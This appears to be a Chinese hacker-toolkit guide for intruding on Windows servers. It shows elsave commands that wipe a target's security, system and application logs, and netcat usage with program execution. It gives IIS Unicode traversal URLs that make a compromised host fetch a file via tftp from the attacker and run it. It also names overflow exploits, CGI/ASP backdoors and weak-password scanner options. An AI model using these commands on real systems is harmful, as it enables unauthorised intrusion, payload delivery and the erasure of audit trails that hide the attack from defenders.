3389登陆器 elsave.exe
3389登陆器事件日志清除工具
elsave -s //IP地址 -l "application" -C
elsave -s //IP地址 -l "system" -C
elsave -s //IP地址 -l "security" -C
执行后成功清除应用程序日志,系统日志,安全日志
3389登陆器hbulot.exe
开启win2kserver和winxp的3389服务
hbulot [/r]
使用/r表示安装完成后自动重起目标使设置生效。
3389登陆器nc.exe(netcat.exe)
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
想要连接到某处: nc [-options] hostname port[s] [ports] ...
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时
3389登陆器 TFTPD32.EXE
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:/winnt/system32/文件名
然后可以直接令文件运行:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
一○、ntis.exe、cmd.exe和cmdASP/' target='_blank' class='infotextkey'asp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
一、一 Xscan命令行运行参数说明:
在检测过程中,按"[空格]"键可以查看各線程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"
1.命令格式: xscan -host 起始IP[-终止IP] 检测项目 [其他选项]
xscan -file 主机列表文件名 检测项目 [其他选项]
其中检测项目 含义如下:
-port : 检测常用服务的端口状态(可通过/dat/config.ini文件的"PORT-SCAN-OPTIONS/PORT-LIST"项定制待检测端口列表);
-ftp : 检测FTP弱口令(可通过/dat/config.ini文件设置用户名/密码字典文件);
-ntpass : 检测NT-Server弱口令(可通过/dat/config.ini文件设置用户名/密码字典文件);
-cgi : 检测CGI漏洞(可通过/dat/config.ini文件的"CGI-ENCODE/encode_type"项设置编码方案);
-iis : 检测IIS漏洞(可通过/dat/config.ini文件的"CGI-ENCODE/encode_type"项设置编码方案);
[其他选项] 含义如下:
-v: 显示详细扫描进度
-p: 跳过Ping不通的主机
-o: 跳过没有检测到开放端口的主机
-t 并发線程数量[,并发主机数量]: 指定最大并发線程数量和并发主机数量, 默认数量为100,10